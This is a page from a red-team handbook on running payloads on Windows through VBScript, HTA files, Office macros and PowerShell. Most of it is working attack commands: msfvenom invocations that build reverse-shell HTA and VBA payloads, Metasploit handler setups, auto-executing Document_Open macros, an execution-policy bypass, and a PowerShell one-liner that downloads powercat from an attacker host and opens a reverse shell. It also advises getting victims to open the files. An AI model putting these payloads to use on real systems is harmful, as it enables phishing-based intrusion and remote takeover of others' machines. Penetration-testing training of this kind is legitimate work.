handbook/tools/4.Exploitation/Shell-and-Reverse-Shell/1.Payloads-Windows-and-Linux/Windows/Macros Payloads (MS World, Excel, ...).md
2024-08-31 01:07:22 +02:00

7.9 KiB

Why using Macros Payload?

As security measures become more robust in organizations, executing payloads within controlled environments becomes increasingly challenging for red teamers. Since .exe files are often blocked or monitored, alternative techniques such as built-in windows scripting technologies are used. In this context, this task delves into some of the popular and effective scripting techniques, including WSH, HTA, VBA, and PSH, used by red teamers to execute payloads.

  • Bypassing .exe Monitoring using WSH, HTA, VBA, PSH

Windows Scripting Host (WSH)

It is a Windows native engine, cscript.exe (for command-line scripts) and wscript.exe (for UI scripts), which are responsible for executing various Microsoft Visual Basic Scripts (VBScript), including vbs and vbe. For more information about VBScript, please visit here. It is important to note that the VBScript engine on a Windows operating system runs and executes applications with the same level of access and permission as a regular user; therefore, it is useful for the red teamers.

Create the code in the vbs or txt file

  • Specify the location of the executable we want to launch
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
  • Exeptions (Some apps are in the default path, so no need to provide the initial executable location.)
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run "cmd.exe"

Launch the file

# Launch the vbs script from vbs file
c:\Windows\System32>wscript c:\Users\thm\Desktop\payload.vbs
c:\Windows\System32>cscript.exe c:\Users\thm\Desktop\payload.vbs

# Launch the vbs script from a .txt file
c:\Windows\System32>wscript /e:VBScript c:\Users\thm\Desktop\payload.txt

More information about VBSscript here ---> https://en.wikipedia.org/wiki/VBScript

An HTML Application (HTA)

HTA stands for “HTML Application.” It allows you to create a downloadable file that takes all the information regarding how it is displayed and rendered. HTML Applications, also known as HTAs, which are dynamic HTML pages containing JScript and VBScript. The LOLBINS (Living-of-the-land Binaries) tool mshta is used to execute HTA files. It can be executed by itself or automatically from Internet Explorer.

Reverse Shell

MSFvenom -> Using hta (HTML)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=1234 -f hta-psh -o exploit.hta
  • Let the victime open the following exploit.hta from Microsoft Edge (This will automaticly run the HTML/HTA element and give back a reverse shell)
  • More infromation ---> Tryhackme Module (Seciton An HTML Application - HTA)

Metasploit -> Using hta (HTML)

use exploit/windows/misc/hta_server
set LHOST IP
set LPORT 1234
set SRVHOST SAME-IP
set payload windows/meterpreter/reverse_tcp
exploit
  • Let the victime open the following exploit.hta from Microsoft Edge (This will automaticly run the HTML/HTA element and give back a reverse shell) --> Using python server for example
  • More infromation ---> Tryhackme Module (Seciton An HTML Application - HTA)

Visual Basic for Application (VBA) - Macros

VBA stands for Visual Basic for Applications, a programming language by Microsoft implemented for Microsoft applications such as Microsoft Word, Excel, PowerPoint, etc. VBA programming allows automating tasks of nearly every keyboard and mouse interaction between a user and Microsoft Office applications. 

Macros are Microsoft Office applications that contain embedded code written in a programming language known as Visual Basic for Applications (VBA). It is used to create custom functions to speed up manual tasks by creating automated processes. One of VBA's features is accessing the Windows Application Programming Interface (API) and other low-level functionality. For more information about VBA, visit here.

  • Create/Run Macros (Microsoft Word) First, we need to open the Visual Basic Editor by selecting view → macros. The Macros window shows to create our own macro within the document.

    • Select a name, change the Macros in for "Document1" and click create

    Finally, run the macro by F5 or Run → Run Sub/UserForm.

    Sub Document_Open()
      HACKING
    End Sub
    
    Sub AutoOpen()
      HACKING
    End Sub
    
    Sub HACKING()
       MsgBox ("You got Hack!")
    End Sub
    

    It is important to note that to make the macro work, we need to save it in Macro-Enabled format such as .doc and docm. Now let's save the file as Word 97-2003 Template where the Macro is enabled by going to File → save Document1 and save as type → Word 97-2003 Document and finally, save.

    Let's close the Word document that we saved. If we reopen the document file, Microsoft Word will show a security message indicating that Macros have been disabled and give us the option to enable it. Once enable the payload will be executed

    • Second Example with calc.exe
    Sub PoC()
    	Dim payload As String
    	payload = "calc.exe"
    	CreateObject("Wscript.Shell").Run payload,0
    End Sub
    
    • To explain the code in detail, with Dim payload As String, we declare payload variable as a string using Dim keyword. With payload = "calc.exe" we are specifying the payload name and finally with CreateObject("Wscript.Shell").Run payload we create a Windows Scripting Host (WSH) object and run the payload. Note that if you want to rename the function name, then you must include the function name in the  AutoOpen() and Document_open() functions too.

    It is important to mention that we can combine VBAs with previously covered methods, such as HTAs and WSH. VBAs/macros by themselves do not inherently bypass any detections.

HTA Reverse Connection (Using Miscrosoft Word Macros)

MSFvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=1234 -f vba
  • Insert the output in the Macros
  • Change Workbook_Open() to Document_Open() ---> Workbook_Open() is for excel sheet

Setup Meterpreter reverse shell

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 1234
exploit 
  • Now wait for the target to open the document

  • More infromation ---> Tryhackme Module (Visual Basic for Application - VBA)

PowerShell (PSH)

PowerShell is an object-oriented programming language executed from the Dynamic Language Runtime (DLR) in .NET with some exceptions for legacy uses. Check out the TryHackMe room, Hacking with PowerShell for more information about PowerShell.

Bypass policy (Help run powershell script)

Get-ExecutionPolicy                            ---> Check Policy

powershell -ex bypass
powershell -ex bypass -File something.ps1

Reverse shell using powercar

git clone https://github.com/besimorhino/powercat.git
  • Open a python server (No need to download it on the target machine since "Launch Powercat" command will do it automaticly)

Launch Netcat

nc -lvp 1337

Launch Powercat (target)

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"